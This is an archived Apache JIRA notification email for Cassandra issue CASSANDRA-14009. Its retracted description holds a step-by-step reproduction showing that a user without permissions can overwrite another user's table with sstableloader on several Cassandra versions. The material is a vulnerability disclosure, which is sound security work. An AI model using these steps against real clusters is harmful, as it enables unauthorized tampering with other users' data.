You are viewing a plain text version of this content. The canonical link for it is here.
Posted to commits@cassandra.apache.org by "Andrzej Bober (JIRA)" <ji...@apache.org> on 2017/11/13 14:07:00 UTC
[jira] [Updated] (CASSANDRA-14009) Any user can overwrite any table
with sstableloader
[ https://issues.apache.org/jira/browse/CASSANDRA-14009?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Andrzej Bober updated CASSANDRA-14009:
--------------------------------------
Description: __deleted__ (was: Hi there,
Looks like any user can overwrite any table with sstableloader.
Tested ubuntu 16.04.3, Java 1.8.0_151_b12, and Cassandra 2.1.19 / 2.2.11 / 3.0.15 / 3.11.1.
{code:sql}
cassandra@cqlsh> CREATE USER alice WITH PASSWORD 'Alice';
cassandra@cqlsh> CREATE USER bob WITH PASSWORD 'Bob';
cassandra@cqlsh> CREATE KEYSPACE db4alice WITH replication = {'class': 'SimpleStrategy', 'replication_factor': 1};
cassandra@cqlsh> GRANT ALL PERMISSIONS ON KEYSPACE db4alice TO alice;
alice@cqlsh> CREATE TABLE users (userid text PRIMARY KEY, password text);
alice@cqlsh> INSERT INTO users (userid, password) VALUES ('user1', 'pass1');
alice@cqlsh> INSERT INTO users (userid, password) VALUES ('user2’, 'pass2’);
alice@cqlsh> INSERT INTO users (userid, password) VALUES ('user3’, 'pass3’);
alice@cqlsh> truncate users;
alice@cqlsh> select * from db4alice.users ;
userid | password
--------+----------
(0 rows)
sstableloader -d 127.0.0.1 -u bob -pw Bob ./db4alice/users
alice@cqlsh> select * from db4alice.users ;
userid | password
--------+----------
user2 | pass2
user1 | pass1
user3 | pass3
(3 rows)
{code}
Looks like a pretty serious bug to me.)
> Any user can overwrite any table with sstableloader
> ---------------------------------------------------
>
> Key: CASSANDRA-14009
> URL: https://issues.apache.org/jira/browse/CASSANDRA-14009
> Project: Cassandra
> Issue Type: Bug
> Components: Auth
> Reporter: Andrzej Bober
> Labels: security
> Fix For: 2.1.x, 2.2.x, 3.0.x, 3.11.x
>
>
> __deleted__
--
This message was sent by Atlassian JIRA
(v6.4.14#64029)
---------------------------------------------------------------------
To unsubscribe, e-mail: commits-unsubscribe@cassandra.apache.org
For additional commands, e-mail: commits-help@cassandra.apache.org